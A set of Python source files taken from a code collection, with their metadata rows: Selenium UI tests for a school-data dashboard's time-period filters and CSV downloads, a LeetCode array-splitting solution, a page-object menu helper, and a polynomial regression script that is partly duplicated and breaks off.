        self.driver.find_element_by_xpath(Data.hyper_link).click()
        self.data.page_loading(self.driver)
        timeperiod = Select(self.driver.find_element_by_id('period'))
        for i in range(1, len(timeperiod.options)):
            timeperiod.select_by_index(i)
            self.data.page_loading(self.driver)
            print(timeperiod.options[i].text, 'is selected and displayed on screen')
            if 'No data found' in self.driver.page_source:
                print(timeperiod.options[i].text, "is not having Data")
            else:
                markers = self.driver.find_elements_by_xpath(Data.dots)
                dots = len(markers) - 1
                if dots == 0:
                    count = count + 1
                    print('Markers are not present on screen')
        return count
    def check_time_series_dropdown_options(self):
        self.data = GetData()
        count = 0
        self.driver.find_element_by_xpath(Data.hyper_link).click()
        self.data.page_loading(self.driver)
        timeperiod = Select(self.driver.find_element_by_id('period'))
        count = len(timeperiod.options) - 1
        return count
    def check_time_overall_series_dropdown(self):
        self.data = GetData()
        count = 0
        self.p = pwd()
        self.driver.find_element_by_xpath(Data.hyper_link).click()
        self.data.page_loading(self.driver)
        timeperiods = Select(self.driver.find_element_by_id('period'))
        timeperiods.select_by_visible_text(' Overall ')
        self.data.page_loading(self.driver)
        if 'No data found' in self.driver.page_source:
            print("Overall is not having Data")
        else:
            markers = self.driver.find_elements_by_class_name(Data.dots)
            dots = len(markers) - 1
            if dots == 0:  # was `markers == 0`, which never matches a list
                print('Markers are not present on screen')
                count = count + 1
            else:
                self.driver.find_element_by_id(Data.Download).click()
                time.sleep(3)
                self.filename = self.p.get_download_dir() + '/' + "District_wise_report_January_2021.csv"
                if os.path.isfile(self.filename) != True:
                    print("Over all time series csv file is not downloaded")
                else:
                    with open(self.filename) as fin:
                        csv_reader = csv.reader(fin, delimiter=',')
                        header = next(csv_reader)
                        schools = 0
                        student = 0
                        for row in csv.reader(fin):
                            schools += int(row[4])
                            student += int(row[3])
                    school = self.driver.find_element_by_id("schools").text
                    sc = re.sub(r'\D', "", school)
                    stds = self.driver.find_element_by_id("students").text
                    std = re.sub(r'\D', "", stds)
                    if int(sc) != int(schools):
                        print("school count mismatched", int(sc), int(schools))
                        count = count + 1
                    if int(student) != int(std):
                        print("student count mismatched", int(sc), int(schools))
                        count = count + 1
                    os.remove(self.filename)
        return count
    def check_time_series_last_7_days(self):
        cal = GetData()
        self.p = pwd()
        count = 0
        self.file = file_extention()
        cal.click_on_state(self.driver)
        timeperiods = Select(self.driver.find_element_by_id('period'))
        timeperiods.select_by_visible_text(' Last 7 Days ')
        cal.page_loading(self.driver)
        if 'No data found' in self.driver.page_source:
            print("Last 7 days is not having Data")
        else:
            markers = self.driver.find_elements_by_class_name(Data.dots)
            dots = len(markers) - 1
            if dots == 0:  # was `markers == 0`, which never matches a list
                print('Markers are not present on screen')
                count = count + 1
            else:
                self.driver.find_element_by_id(Data.Download).click()
                time.sleep(3)
                self.filename = self.p.get_download_dir() + '/' + "District_wise_report_January_2021.csv"
                if os.path.isfile(self.filename) != True:
                    print(" Last 7 Days time series csv file is not downloaded")
                else:
                    with open(self.filename) as fin:
                        csv_reader = csv.reader(fin, delimiter=',')
                        header = next(csv_reader)
                        schools = 0
                        student = 0
                        for row in csv.reader(fin):
                            schools += int(row[4])
                            student += int(row[3])
                    school = self.driver.find_element_by_id("schools").text
                    sc = re.sub(r'\D', "", school)
                    stds = self.driver.find_element_by_id("students").text
                    std = re.sub(r'\D', "", stds)
                    if int(sc) != int(schools):
                        print("school count mismatched", int(sc), int(schools))
                        count = count + 1
                    if int(student) != int(std):
                        print("student count mismatched", int(sc), int(schools))
                        count = count + 1
                    os.remove(self.filename)
        return count
    def check_time_series_last_30_days(self):
        cal = GetData()
        self.p = pwd()
        count = 0
        self.file = file_extention()
        cal.click_on_state(self.driver)
        self.year, self.month = cal.get_student_month_and_year_values()
        timeperiods = Select(self.driver.find_element_by_id('period'))
        timeperiods.select_by_visible_text(' Last 30 Days ')
        cal.page_loading(self.driver)
        if 'No data found' in self.driver.page_source:
            print("Last 30 days is not having Data")
        else:
            markers = self.driver.find_elements_by_class_name(Data.dots)
            dots = len(markers) - 1
            if dots == 0:  # was `markers == 0`, which never matches a list
                print('Markers are not present on screen')
                count = count + 1
            else:
                cal.page_loading(self.driver)
                self.driver.find_element_by_id(Data.Download).click()
                time.sleep(5)
                self.filename = self.p.get_download_dir() + '/' + "District_wise_report_" + self.month + "_" + self.year + ".csv"
                if os.path.isfile(self.filename) != True:
                    print(" Last 30 Days time series csv file is not downloaded")
                else:
                    with open(self.filename) as fin:
                        csv_reader = csv.reader(fin, delimiter=',')
                        header = next(csv_reader)
                        schools = 0
                        student = 0
                        for row in csv.reader(fin):
                            schools += int(row[4])
                            student += int(row[3])
                    school = self.driver.find_element_by_id("schools").text
                    sc = re.sub(r'\D', "", school)
                    stds = self.driver.find_element_by_id("students").text
                    std = re.sub(r'\D', "", stds)
                    if int(sc) != int(schools):
                        print("school count mismatched", int(sc), int(schools))
                        count = count + 1
                    if int(student) != int(std):
                        print("student count mismatched", int(sc), int(schools))
                        count = count + 1
                    os.remove(self.filename)
        return count
    def check_time_series_day(self):
        cal = GetData()
        self.p = pwd()
        count = 0
        self.file = file_extention()
        cal.click_on_state(self.driver)
        self.year, self.month = cal.get_student_month_and_year_values()
        timeperiods = Select(self.driver.find_element_by_id('period'))
        timeperiods.select_by_visible_text(' Last Day ')
        cal.page_loading(self.driver)
        if 'No data found' in self.driver.page_source:
            print("Last Day is not having Data")
        else:
            markers = self.driver.find_elements_by_class_name(Data.dots)
            dots = len(markers) - 1
            if dots == 0:  # was `markers == 0`, which never matches a list
                print('Markers are not present on screen')
                count = count + 1
            else:
                cal.page_loading(self.driver)
                self.driver.find_element_by_id(Data.Download).click()
                time.sleep(5)
                self.filename = self.p.get_download_dir() + '/' + "District_wise_report_" + self.month + "_" + self.year + ".csv"
                if os.path.isfile(self.filename) != True:
                    print(" Last Day time series csv file is not downloaded")
                else:
                    with open(self.filename) as fin:
                        csv_reader = csv.reader(fin, delimiter=',')
                        header = next(csv_reader)
                        schools = 0
                        student = 0
                        for row in csv.reader(fin):
                            schools += int(row[4])
                            student += int(row[3])
                    school = self.driver.find_element_by_id("schools").text
                    sc = re.sub(r'\D', "", school)
                    stds = self.driver.find_element_by_id("students").text
                    std = re.sub(r'\D', "", stds)
                    if int(sc) != int(schools):
                        print("school count mismatched", int(sc), int(schools))
                        count = count + 1
                    if int(student) != int(std):
                        print("student count mismatched", int(sc), int(schools))
                        count = count + 1
                    os.remove(self.filename)
        return count
    def check_time_series_month_and_year(self):
        cal = GetData()
        self.p = pwd()
        count = 0
        self.file = file_extention()
        cal.click_on_state(self.driver)
        self.year, self.month = cal.get_student_month_and_year_values()
        timeperiods = Select(self.driver.find_element_by_id('period'))
        timeperiods.select_by_visible_text(' Year and Month ')
        cal.page_loading(self.driver)
        if 'No data found' in self.driver.page_source:
            print("Year and month is not having Data")
        else:
            markers = self.driver.find_elements_by_class_name(Data.dots)
            dots = len(markers) - 1
            if dots == 0:  # was `markers == 0`, which never matches a list
                print('Markers are not present on screen')
                count = count + 1
            else:
                cal.page_loading(self.driver)
                self.driver.find_element_by_id(Data.Download).click()
                time.sleep(5)
                self.filename = self.p.get_download_dir() + '/' + "District_wise_report_" + self.month + "_" + self.year + ".csv"
                if os.path.isfile(self.filename) != True:
                    print(" Year and Month time series csv file is not downloaded")
                else:
                    with open(self.filename) as fin:
                        csv_reader = csv.reader(fin, delimiter=',')
                        header = next(csv_reader)
                        schools = 0
                        student = 0
                        for row in csv.reader(fin):
                            schools += int(row[4])
                            student += int(row[3])
                    school = self.driver.find_element_by_id("schools").text
                    sc = re.sub(r'\D', "", school)
                    stds = self.driver.find_element_by_id("students").text
                    std = re.sub(r'\D', "", stds)
                    if int(sc) != int(schools):
                        print("school count mismatched", int(sc), int(schools))
                        count = count + 1
                    if int(student) != int(std):
                        print("student count mismatched", int(sc), int(schools))
                        count = count + 1
                    os.remove(self.filename)
        return count
    def check_year_and_month_dropdowns_csv_download(self):
        cal = GetData()
        self.p = pwd()
        count = 0
        self.file = file_extention()
        cal.click_on_state(self.driver)
        timeperiods = Select(self.driver.find_element_by_id('period'))
        timeperiods.select_by_visible_text(' Year and Month ')
        cal.page_loading(self.driver)
        if 'No data found' in self.driver.page_source:
            print("Year and month is not having Data")
        else:
            markers = self.driver.find_elements_by_class_name(Data.dots)
            dots = len(markers) - 1
            if dots == 0:  # was `markers == 0`, which never matches a list
                print('Markers are not present on screen')
                count = count + 1
            else:
                cal.page_loading(self.driver)
                year = Select(self.driver.find_element_by_id('year'))
                month = Select(self.driver.find_element_by_id('month'))
                for i in range(1, len(year.options)):
                    year.select_by_index(i)
                    cal.page_loading(self.driver)
                    for j in range(1, len(month.options)):
                        month.select_by_index(j)
                        cal.page_loading(self.driver)
                        self.driver.find_element_by_id(Data.Download).click()
                        time.sleep(5)
                        self.filename = self.p.get_download_dir() + '/' + "District_wise_report_" + month.options[j].text + "_" + year.options[i].text + ".csv"
                        print(self.filename)
                        if os.path.isfile(self.filename) != True:
                            print(year.options[i].text, month.options[j].text, "time series csv file is not downloaded")
                        else:
                            with open(self.filename) as fin:
                                csv_reader = csv.reader(fin, delimiter=',')
                                header = next(csv_reader)
                                schools = 0
                                student = 0
                                for row in csv.reader(fin):
                                    schools += int(row[4])
                                    student += int(row[3])
                            school = self.driver.find_element_by_id("schools").text
                            sc = re.sub(r'\D', "", school)
                            stds = self.driver.find_element_by_id("students").text
                            std = re.sub(r'\D', "", stds)
                            if int(sc) != int(schools):
                                print("school count mismatched", int(sc), int(schools))
                                count = count + 1
                            if int(student) != int(std):
                                print("student count mismatched", int(sc), int(schools))
                                count = count + 1
                            os.remove(self.filename)
        return count
    def check_select_time_series_and_click_on_block_cluster_school_btns(self):
        self.data = GetData()
        count = 0
        self.driver.find_element_by_xpath(Data.hyper_link).click()
        self.data.page_loading(self.driver)
        timeperiod = Select(self.driver.find_element_by_id('period'))
        for i in range(1, len(timeperiod.options)):
            timeperiod.select_by_index(i)
            self.data.page_loading(self.driver)
            print(timeperiod.options[i].text, 'is selected and displayed on screen')
            if 'No data found' in self.driver.page_source:
                print(timeperiod.options[i].text, "is not having Data")
            else:
                cur_students = self.driver.find_element_by_id(Data.students).text
                cur_schools = self.driver.find_element_by_id(Data.schoolcount).text
                cstudents = re.sub(r'\D', '', cur_students)
                cschools = re.sub(r'\D', '', cur_schools)
                blk = self.driver.find_element_by_id(Data.SAR_Blocks_btn).click()
                self.data.page_loading(self.driver)
                blk_students = self.driver.find_element_by_id(Data.students).text
                blk_schools = self.driver.find_element_by_id(Data.schoolcount).text
                bstudents = re.sub(r'\D', '', blk_students)
                bschools = re.sub(r'\D', '', blk_schools)
                cls = self.driver.find_element_by_id(Data.SAR_Clusters_btn).click()
                self.data.page_loading(self.driver)
                cls_students = self.driver.find_element_by_id(Data.students).text
                cls_schools = self.driver.find_element_by_id(Data.schoolcount).text
                cl_students = re.sub(r'\D', '', cls_students)
                cl_schools = re.sub(r'\D', '', cls_schools)
                sc = self.driver.find_element_by_id(Data.SAR_Schools_btn).click()
                self.data.page_loading(self.driver)
                sc_students = self.driver.find_element_by_id(Data.students).text
                sc_schools = self.driver.find_element_by_id(Data.schoolcount).text
                s_students = re.sub(r'\D', '', sc_students)
                s_schools = re.sub(r'\D', '', sc_schools)
                count = 0
                # compare the digit-only values; the raw cur_* strings contain
                # label text and would make int() raise
                if int(cschools) != int(bschools):
                    print('Block level mismatch found in footers', cur_schools, bschools)
                    count = count + 1
                if int(cstudents) != int(bstudents):
                    print('Block level mismatch found in footers', cur_students, blk_students)
                    count = count + 1
                if int(cschools) != int(cl_schools):
                    print('Cluster level mismatch found in footers', cur_schools, cl_schools)
                    count = count + 1
                if int(cstudents) != int(cl_students):
                    print('Cluster level mismatch found in footers', cur_students, cl_students)
                    count = count + 1
                if int(cschools) != int(s_schools):
                    print('School level mismatch found in footers', cur_schools, s_schools)
                    count = count + 1
                if int(cstudents) != int(s_students):
                    print('School level mismatch found in footers', cur_students, s_students)
                    count = count + 1
        return count
| 48.580402 | 151 | 0.512801 | 2,155 | 19,335 | 4.417169 | 0.068677 | 0.091396 | 0.075008 | 0.097069 | 0.898204 | 0.889274 | 0.879084 | 0.841895 | 0.813321 | 0.791785 | 0 | 0.008769 | 0.386605 | 19,335 | 397 | 152 | 48.702771 | 0.793845 | 0 | 0 | 0.799465 | 0 | 0 | 0.09641 | 0.008172 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026738 | false | 0 | 0.024064 | 0 | 0.07754 | 0.112299 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
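Six of the methods above repeat the same verification: sum columns 3 and 4 of the downloaded CSV, then strip non-digits out of the footer labels before comparing. A pure-Python sketch of those two steps (helper names are hypothetical, not from the test suite):

```python
import csv
import io
import re


def csv_totals(fileobj, student_col=3, school_col=4):
    """Sum the student and school columns of a district-wise report CSV."""
    reader = csv.reader(fileobj)
    next(reader)  # skip the header row, as the tests above do
    students = schools = 0
    for row in reader:
        students += int(row[student_col])
        schools += int(row[school_col])
    return students, schools


def footer_number(text):
    """Extract the integer from a footer label such as 'Schools: 1,024'."""
    return int(re.sub(r'\D', '', text))


report = io.StringIO("district,block,cluster,students,schools\nA,b1,c1,10,2\nB,b2,c2,5,3\n")
totals = csv_totals(report)
```

Factoring the check out like this would also remove the copy-pasted `with open(...)` blocks from each method.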
aab47bb89be3b2d1405b74d808fad6b3a179df6d | 6,327 | py | Python | leetcode/hard/Split_Array_Largest_Sum.py | shhuan/algorithms | 2830c7e2ada8dfd3dcdda7c06846116d4f944a27 | [
"MIT"
] | null | null | null | leetcode/hard/Split_Array_Largest_Sum.py | shhuan/algorithms | 2830c7e2ada8dfd3dcdda7c06846116d4f944a27 | [
"MIT"
] | null | null | null | leetcode/hard/Split_Array_Largest_Sum.py | shhuan/algorithms | 2830c7e2ada8dfd3dcdda7c06846116d4f944a27 | [
"MIT"
] | 1 | 2022-03-09T04:52:55.000Z | 2022-03-09T04:52:55.000Z | # -*- coding: utf-8 -*-
import bisect
"""
Given an array which consists of non-negative integers and an integer m, you can split the array into m non-empty continuous subarrays. Write an algorithm to minimize the largest sum among these m subarrays.
Note:
If n is the length of array, assume the following constraints are satisfied:
1 ≤ n ≤ 1000
1 ≤ m ≤ min(50, n)
Examples:
Input:
nums = [7,2,5,10,8]
m = 2
Output:
18
Explanation:
There are four ways to split nums into two subarrays.
The best way is to split it into [7,2,5] and [10,8],
where the largest sum among the two subarrays is only 18.
"""
import time
class Solution(object):
def splitArray(self, nums, m):
"""
:type nums: List[int]
:type m: int
:rtype: int
"""
N = len(nums)
A = nums
left = [0] * (N + 1)
for i in range(1, N + 1):
left[i] = left[i - 1] + A[i - 1]
def check(val, numsplit):
i, v, c = 0, 0, 0
while i < N + 1:
c += 1
j = bisect.bisect_right(left, v + val, i)
if i == j: # left[i] > v + val: a single element already exceeds val
return False
i = j
v = left[i - 1]
return c <= numsplit
lo = left[1]
hi = left[-1]
while lo < hi:
mid = lo + (hi - lo) // 2
if check(mid, m):
hi = mid
else:
lo = mid + 1
return lo
def splitArray2(self, nums, m):
"""
:type nums: List[int]
:type m: int
:rtype: int
"""
N = len(nums)
dp = [[float('inf') for _ in range(m + 1)] for _ in range(N + 1)]
sm = 0
for i in range(N):
dp[i][1] = sm
sm += nums[i]
dp[N][1] = sm
for i in range(1, N + 1):
for j in range(1, min(m + 1, i + 1)):
# dp[i][j] = min over k of max(dp[i-k][j-1], sum(nums[i-k:i])): the minimized
# largest sum when the first i numbers are split into j parts
sm = 0
for k in range(1, i - j + 2):
sm += nums[i - k]
if sm > dp[i][j]: # nums are all positive integers
break
dp[i][j] = min(dp[i][j], max(dp[i - k][j - 1], sm))
return dp[N][m]
s = Solution()
t0 = time.time()
print(s.splitArray([1,4,4], 3))
# print(s.splitArray([1,2147483646], 2))
# print(s.splitArray([499,498,497,496,495,494,493,492,491,490,489,488,487,486,485,484,483,482,481,480,479,478,477,476,475,474,473,472,471,470,469,468,467,466,465,464,463,462,461,460,459,458,457,456,455,454,453,452,451,450,449,448,447,446,445,444,443,442,441,440,439,438,437,436,435,434,433,432,431,430,429,428,427,426,425,424,423,422,421,420,419,418,417,416,415,414,413,412,411,410,409,408,407,406,405,404,403,402,401,400,399,398,397,396,395,394,393,392,391,390,389,388,387,386,385,384,383,382,381,380,379,378,377,376,375,374,373,372,371,370,369,368,367,366,365,364,363,362,361,360,359,358,357,356,355,354,353,352,351,350,349,348,347,346,345,344,343,342,341,340,339,338,337,336,335,334,333,332,331,330,329,328,327,326,325,324,323,322,321,320,319,318,317,316,315,314,313,312,311,310,309,308,307,306,305,304,303,302,301,300,299,298,297,296,295,294,293,292,291,290,289,288,287,286,285,284,283,282,281,280,279,278,277,276,275,274,273,272,271,270,269,268,267,266,265,264,263,262,261,260,259,258,257,256,255,254,253,252,251,250,249,248,247,246,245,244,243,242,241,240,239,238,237,236,235,234,233,232,231,230,229,228,227,226,225,224,223,222,221,220,219,218,217,216,215,214,213,212,211,210,209,208,207,206,205,204,203,202,201,200,199,198,197,196,195,194,193,192,191,190,189,188,187,186,185,184,183,182,181,180,179,178,177,176,175,174,173,172,171,170,169,168,167,166,165,164,163,162,161,160,159,158,157,156,155,154,153,152,151,150,149,148,147,146,145,144,143,142,141,140,139,138,137,136,135,134,133,132,131,130,129,128,127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0], 50))
print(time.time() - t0)
t0 = time.time()
print(s.splitArray2([499,498,497,496,495,494,493,492,491,490,489,488,487,486,485,484,483,482,481,480,479,478,477,476,475,474,473,472,471,470,469,468,467,466,465,464,463,462,461,460,459,458,457,456,455,454,453,452,451,450,449,448,447,446,445,444,443,442,441,440,439,438,437,436,435,434,433,432,431,430,429,428,427,426,425,424,423,422,421,420,419,418,417,416,415,414,413,412,411,410,409,408,407,406,405,404,403,402,401,400,399,398,397,396,395,394,393,392,391,390,389,388,387,386,385,384,383,382,381,380,379,378,377,376,375,374,373,372,371,370,369,368,367,366,365,364,363,362,361,360,359,358,357,356,355,354,353,352,351,350,349,348,347,346,345,344,343,342,341,340,339,338,337,336,335,334,333,332,331,330,329,328,327,326,325,324,323,322,321,320,319,318,317,316,315,314,313,312,311,310,309,308,307,306,305,304,303,302,301,300,299,298,297,296,295,294,293,292,291,290,289,288,287,286,285,284,283,282,281,280,279,278,277,276,275,274,273,272,271,270,269,268,267,266,265,264,263,262,261,260,259,258,257,256,255,254,253,252,251,250,249,248,247,246,245,244,243,242,241,240,239,238,237,236,235,234,233,232,231,230,229,228,227,226,225,224,223,222,221,220,219,218,217,216,215,214,213,212,211,210,209,208,207,206,205,204,203,202,201,200,199,198,197,196,195,194,193,192,191,190,189,188,187,186,185,184,183,182,181,180,179,178,177,176,175,174,173,172,171,170,169,168,167,166,165,164,163,162,161,160,159,158,157,156,155,154,153,152,151,150,149,148,147,146,145,144,143,142,141,140,139,138,137,136,135,134,133,132,131,130,129,128,127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0], 50))
print(time.time() - t0)
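Both solutions above can be sanity-checked on tiny inputs against an exhaustive split; this standalone sketch (independent of the `Solution` class) enumerates every placement of the m-1 cut points:

```python
from itertools import combinations

def brute_min_largest_sum(nums, m):
    # Enumerate all ways to place m-1 cut points; keep the best worst-subarray sum.
    n = len(nums)
    best = float('inf')
    for cuts in combinations(range(1, n), m - 1):
        bounds = (0,) + cuts + (n,)
        worst = max(sum(nums[bounds[i]:bounds[i + 1]]) for i in range(m))
        best = min(best, worst)
    return best

checks = [brute_min_largest_sum([7, 2, 5, 10, 8], 2),  # docstring example -> 18
          brute_min_largest_sum([1, 4, 4], 3)]
```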
| 57 | 1,918 | 0.627312 | 1,387 | 6,327 | 2.862293 | 0.437635 | 0.012343 | 0.00806 | 0.008312 | 0.752645 | 0.744584 | 0.74005 | 0.732997 | 0.732997 | 0.732997 | 0 | 0.537653 | 0.158369 | 6,327 | 110 | 1,919 | 57.518182 | 0.207136 | 0.345187 | 0 | 0.192308 | 0 | 0 | 0.00086 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.038462 | 0 | 0.192308 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
aaceb836eb3ef028f3048896b48ad8820fab2d12 | 1,810 | py | Python | e2e/api/components/menu_component.py | Tomekske/AutoUpdater | a37136895c61ac9f7b5da30b376be49d033442be | [
"MIT"
] | null | null | null | e2e/api/components/menu_component.py | Tomekske/AutoUpdater | a37136895c61ac9f7b5da30b376be49d033442be | [
"MIT"
] | null | null | null | e2e/api/components/menu_component.py | Tomekske/AutoUpdater | a37136895c61ac9f7b5da30b376be49d033442be | [
"MIT"
] | null | null | null | class Menu():
'''Class to model the menu component'''
def __init__(self, driver):
'''Menu constructor
Args:
driver: Driver object
'''
self.driver = driver
def click_add_album_item(self):
'''Click on the add album button'''
xpath = "/html/body/app-root/div/div[2]/div[1]/app-menu/div/ng-material-multilevel-menu/div/mat-list/ng-list-item[3]/mat-list-item/div/a/div"
# selector = "#test-open-album-id"
self.driver.click_by_xpath(xpath)
def click_add_library_item(self):
'''Click on the add library button'''
xpath_collapse = "/html/body/app-root/div/div[2]/div[1]/app-menu/div/ng-material-multilevel-menu/div/mat-list/ng-list-item[1]/mat-list-item/div"
xpath_add = "/html/body/app-root/div/div[2]/div[1]/app-menu/div/ng-material-multilevel-menu/div/mat-list/ng-list-item[1]/div/ng-list-item[2]/mat-list-item/div/a/div"
# Open the menu before clicking on the add library item
self.driver.click_by_xpath(xpath_collapse)
# Click on the add library item
self.driver.click_by_xpath(xpath_add)
def click_add_collection_item(self):
'''Click on the add collection button'''
xpath_collapse = "/html/body/app-root/div/div[2]/div[1]/app-menu/div/ng-material-multilevel-menu/div/mat-list/ng-list-item[2]/mat-list-item/div/a/div[1]"
xpath_add = "/html/body/app-root/div/div[2]/div[1]/app-menu/div/ng-material-multilevel-menu/div/mat-list/ng-list-item[2]/div/ng-list-item[2]/mat-list-item/div/a/div"
# Open the menu before clicking on the add collection item
self.driver.click_by_xpath(xpath_collapse)
# Click on the add collection item
self.driver.click_by_xpath(xpath_add)
| 44.146341 | 173 | 0.651381 | 291 | 1,810 | 3.945017 | 0.151203 | 0.083624 | 0.04878 | 0.05662 | 0.802265 | 0.796167 | 0.702091 | 0.702091 | 0.702091 | 0.702091 | 0 | 0.012431 | 0.2 | 1,810 | 40 | 174 | 45.25 | 0.780387 | 0.210497 | 0 | 0.25 | 0 | 0.3125 | 0.50696 | 0.50696 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
2aa9454922d8f497f389c844839592b553695ce1 | 8,706 | py | Python | katas/kata12.py | cesarau04/metodosnumericos | 9670c91d5c659d2bfb1b95e85c437e6deed9ec28 | [
"MIT"
] | null | null | null | katas/kata12.py | cesarau04/metodosnumericos | 9670c91d5c659d2bfb1b95e85c437e6deed9ec28 | [
"MIT"
] | null | null | null | katas/kata12.py | cesarau04/metodosnumericos | 9670c91d5c659d2bfb1b95e85c437e6deed9ec28 | [
"MIT"
] | null | null | null | # Regresion polinomial
import matplotlib.pyplot as plt
import numpy as np
def createMatrix(m,n, valor=0):
C = []
for i in range(m):
C.append([]) #could be c.append([valor]*n)
for j in range(n):
C[i].append(valor)
return C
def getDimensions(A):
return (len(A),len(A[0]))
def copyMatrix(B):
m,n = getDimensions(B)
A = createMatrix(m,n)
for i in range(m):
for j in range(n):
A[i][j]=B[i][j]
return A
def sumMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (Am != Bm or An != Bn):
print("Error: matrices of different sizes")
return []
C = createMatrix(Am,An)
for i in range(Am):
for j in range(An):
C[i][j] = A[i][j] + B[i][j]
return C
def restaMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (Am != Bm or An != Bn):
print("Error: matrices of different sizes")
return []
C = createMatrix(Am,An)
for i in range(Am):
for j in range(An):
C[i][j] = A[i][j] - B[i][j]
return C
def multMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (An != Bm):
print("Error: multiplication needs #columns of A equal to #rows of B")
return []
C = createMatrix(Am,Bn)
counter = 0
for i in range(Am):
for j in range(Bn):
for k in range(An):
C[i][j] += A[i][k] * B[k][j]
return C
def getAdyacente(A,r,c):
Am, An = getDimensions(A)
C = createMatrix(Am-1, An-1, 0)
for i in range(Am):
if (i == r):
continue
for j in range(An):
if (j == c):
continue
ci = 0
cj = 0
if (i < r):
ci = i
else:
ci = i-1
if (j < c):
cj = j
else:
cj = j-1
C[ci][cj] = A[i][j]
return C
def detMatrix(A):
m,n = getDimensions(A)
if m!=n:
print("Matrix is not square")
return []
if (n==1):
return A[0][0]
if (n==2):
return (A[0][0]*A[1][1]) - (A[1][0]*A[0][1])
det = 0
for j in range(m):
det += (-1)**j*A[0][j]*detMatrix(getAdyacente(A,0,j))
return det
def getMatrizTranspuesta(A):
m,n = getDimensions(A)
C = createMatrix(n,m,0)
for i in range(m):
for j in range(n):
C[j][i] = A[i][j]
return C
def getMatrizAdjunta(A):
m,n = getDimensions(A)
if m != n:
print("The matrix is not square")
return []
C = createMatrix(m,n,0)
for i in range(m):
for j in range(n):
C[i][j] = ((-1)**(i+j))*detMatrix(getAdyacente(A,i,j))
return C
def getMatrizInversa(A):
m,n = getDimensions(A)
if m != n:
print("The matrix is not square")
return []
detA = detMatrix(A)
if detA== 0:
print("The matrix has no inverse")
return []
At = getMatrizTranspuesta(A)
adjA = getMatrizAdjunta(At)
invDetA = 1/detA
C = createMatrix(m,n,0)
for i in range(m):
for j in range(n):
C[i][j]=invDetA*adjA[i][j]
return C
def regPolinomial(grado, x, y):
grado += 1
A = createMatrix(grado,grado)
for i in range(grado):
for j in range(grado):
A[i][j] = sum( xi**(i+j) for xi in x)
C = createMatrix(grado,1)
for i in range(grado):
C[i][0] = sum((xi**i)*yi for xi,yi in zip(x,y))
invA = getMatrizInversa(A)
return multMatrix(invA,C)
def evalPolinomio(coef,x):
y = []
coef = np.asarray(coef)
for i in range(len(x)):
y.append(0)
for c in range(len(coef)):
y[i] += (x[i]**c) * coef[c]
return y
x = [8, 16, 24, 32] # max degree = number of points - 1
y = [4.1, 4.5, 5.1, 6.1]
plt.plot(x,y,'rx')
#plt.show()
coef = regPolinomial(3, x, y) # change here to set the degree of the polynomial to fit
print(coef)
x2 = np.linspace(5,35,100)
y2 = evalPolinomio(coef,x2)
plt.plot(x2,y2)
plt.show()
yesp = evalPolinomio(coef,[7])
print("expected weight at 7 weeks --> ", yesp[0][0])
#-------------------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------------------
# Polynomial regression
import matplotlib.pyplot as plt
import numpy as np
def createMatrix(m,n, valor=0):
C = []
for i in range(m):
C.append([]) #could be c.append([valor]*n)
for j in range(n):
C[i].append(valor)
return C
def getDimensions(A):
return (len(A),len(A[0]))
def copyMatrix(B):
m,n = getDimensions(B)
A = createMatrix(m,n)
for i in range(m):
for j in range(n):
A[i][j]=B[i][j]
return A
def sumMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (Am != Bm or An != Bn):
print("Error: matrices of different sizes")
return []
C = createMatrix(Am,An)
for i in range(Am):
for j in range(An):
C[i][j] = A[i][j] + B[i][j]
return C
def restaMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (Am != Bm or An != Bn):
print("Error: matrices of different sizes")
return []
C = createMatrix(Am,An)
for i in range(Am):
for j in range(An):
C[i][j] = A[i][j] - B[i][j]
return C
def multMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (An != Bm):
print("Error: multiplication needs #columns of A equal to #rows of B")
return []
C = createMatrix(Am,Bn)
counter = 0
for i in range(Am):
for j in range(Bn):
for k in range(An):
C[i][j] += A[i][k] * B[k][j]
return C
